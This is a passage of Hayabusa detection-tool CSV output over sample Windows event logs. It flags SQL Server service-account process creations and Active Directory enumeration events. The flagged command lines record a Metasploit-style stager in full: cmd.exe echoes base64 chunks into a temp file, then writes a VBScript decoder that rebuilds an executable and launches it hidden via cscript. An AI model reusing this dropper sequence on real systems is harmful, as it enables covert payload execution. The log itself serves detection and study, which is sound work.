Svc-SQL-DB01 | LID: 
0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:25.618 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x568 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:25.896 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x12a4 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:26.169 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xa30 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:26.444 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAQAAADAAAIAAAAAAAAAAAAAAAAAAAAEACQQAAEgAAABgUAEAaAcAAAAAAAAAAAAAAAAAAAAAAABoBzQAAABWAFMAXwBW>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x7e4 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:26.718 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x9b8 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:26.991 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
bgBpAG4AZwAgAHAAZQByAG0AaQBzAHMAaQBvAG4AcwAgAGEAbgBkACAAbABpAG0AaQB0AGEAdABpAG8AbgBzACAAdQBuAGQAZQByACAAdABoAGUAIABMAGkAYwBlAG4AcwBlAC4AAABWABsAAQBDAG8AbQBwAGEAbgB5AE4AYQBtAGUAAAAAAEEAcABhAGMAaABlACAAUwBvAGYAdAB3AGEAcgBlACAARgBvAHUAbgBkAGEAdABpAG8AbgAAAAAAagAhAAEARgBpAGwAZQBEAGUAcwBjAHIAaQBwAHQAaQBvAG4AAAAAAEEAcABhAGMAaABlAEIAZQBuAGMAaAAgAGMAbwBtAG0AYQBuAGQAIABsAGkAbgBlACAAdQB0AGkAbABpAHQAeQAAAAAALgAHAAEARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAAAAAyAC4AMgAuADEANAAAAAAALgAHAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAABhAGIALgBlAHgAZQAAAAAAggAvAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAQwBvAHAAeQByAGkAZwBoAHQAIAAyADAAMAA5ACAAVABoAGUAIABBAHAAYQBjAGgAZQAgAFMAbwBmAHQAdwBhAHIAZQAgAEYAbwB1AG4AZABhAHQAaQBvAG4ALgAAAAAANgAHAAEATwByAGkAZwBpAG4AYQBsAEYAaQBsAGUAbgBhAG0AZQAAAGEAYgAuAGUAeABlAAAAAABGABMAAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAEEAcABhAGMAaABlACAASABUAFQAUAAgAFMAZQByAHYAZQByAAAAAAAyAAcAAQBQAHIAbwBkAHUAYwB0AFYAZQByAHMAaQBvAG4AAAAyAC4AMgAuADEANAAAAAAARAAAAAEAVgBhAHIARgBpAGwAZQBJAG4AZgBvAAAAAAAkAAQAAABUAHIAYQBuAHMAbABhAHQAaQBvAG4AAAAAAAkEsAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xe90 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:27.266 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x3bc | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:27.540 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATkIxMAAAAAA2gMFKAQAAAEM6XGxvY2FsMFxhc2ZccmVsZWFzZVxidWlsZC0yLjIuMTRcc3VwcG9ydFxSZWxlYXNlXGFiLnBkYgA=>>%TEMP%\feyQV.b64 & echo Set fs = CreateObject(""Scripting.FileSystemObject"") >>%TEMP%\UbdXv.vbs & echo Set file = fs.GetFile(""%TEMP%\feyQV.b64"") >>%TEMP%\UbdXv.vbs & echo If file.Size Then >>%TEMP%\UbdXv.vbs & echo Set fd = fs.OpenTextFile(""%TEMP%\feyQV.b64"", 1) >>%TEMP%\UbdXv.vbs & echo data = fd.ReadAll >>%TEMP%\UbdXv.vbs & echo data = Replace(data, vbCrLf, """") >>%TEMP%\UbdXv.vbs & echo data = base64_decode(data) >>%TEMP%\UbdXv.vbs & echo fd.Close >>%TEMP%\UbdXv.vbs | Path: C:\Windows\System32\cmd.exe | PID: 0x1294 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:27.815 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo Set ofs = 
CreateObject(""Scripting.FileSystemObject"").OpenTextFile(""%TEMP%\TVupu.exe"", 2, True) >>%TEMP%\UbdXv.vbs & echo ofs.Write data >>%TEMP%\UbdXv.vbs & echo ofs.close >>%TEMP%\UbdXv.vbs & echo Set shell = CreateObject(""Wscript.Shell"") >>%TEMP%\UbdXv.vbs & echo shell.run ""%TEMP%\TVupu.exe"", 0, false >>%TEMP%\UbdXv.vbs & echo Else >>%TEMP%\UbdXv.vbs & echo Wscript.Echo ""The file is empty."" >>%TEMP%\UbdXv.vbs & echo End If >>%TEMP%\UbdXv.vbs & echo Function base64_decode(byVal strIn) >>%TEMP%\UbdXv.vbs & echo Dim w1, w2, w3, w4, n, strOut >>%TEMP%\UbdXv.vbs & echo For n = 1 To Len(strIn) Step 4 >>%TEMP%\UbdXv.vbs & echo w1 = mimedecode(Mid(strIn, n, 1)) >>%TEMP%\UbdXv.vbs & echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>%TEMP%\UbdXv.vbs & echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>%TEMP%\UbdXv.vbs & echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>%TEMP%\UbdXv.vbs & echo If Not w2 Then _ >>%TEMP%\UbdXv.vbs & echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>%TEMP%\UbdXv.vbs & echo If Not w3 Then _ >>%TEMP%\UbdXv.vbs & echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>%TEMP%\UbdXv.vbs & echo If Not w4 Then _ >>%TEMP%\UbdXv.vbs & echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>%TEMP%\UbdXv.vbs & echo Next >>%TEMP%\UbdXv.vbs & echo base64_decode = strOut >>%TEMP%\UbdXv.vbs & echo End Function >>%TEMP%\UbdXv.vbs & echo Function mimedecode(byVal strIn) >>%TEMP%\UbdXv.vbs | Path: C:\Windows\System32\cmd.exe | PID: 0x1024 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:28.092 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo Base64Chars = 
""ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"" >>%TEMP%\UbdXv.vbs & echo If Len(strIn) = 0 Then >>%TEMP%\UbdXv.vbs & echo mimedecode = -1 : Exit Function >>%TEMP%\UbdXv.vbs & echo Else >>%TEMP%\UbdXv.vbs & echo mimedecode = InStr(Base64Chars, strIn) - 1 >>%TEMP%\UbdXv.vbs & echo End If >>%TEMP%\UbdXv.vbs & echo End Function >>%TEMP%\UbdXv.vbs & cscript //nologo %TEMP%\UbdXv.vbs | Path: C:\Windows\System32\cmd.exe | PID: 0xc0c | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 07:58:28.113 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cscript //nologo C:\Users\SVC-SQ~1\AppData\Local\Temp\UbdXv.vbs | Path: C:\Windows\System32\cscript.exe | PID: 0x1218 | User: Svc-SQL-DB01 | LID: 0x1304385,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
2020-08-02 20:21:46.062 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
2020-08-02 20:21:46.068 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
2020-08-02 20:21:46.078 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
2020-08-02 20:21:46.083 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
2020-08-02 20:21:46.088 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
2020-08-02 20:21:46.094 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
2020-08-02 20:21:46.100 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
2020-08-02 20:21:46.110 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
2020-08-02 20:21:46.117 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
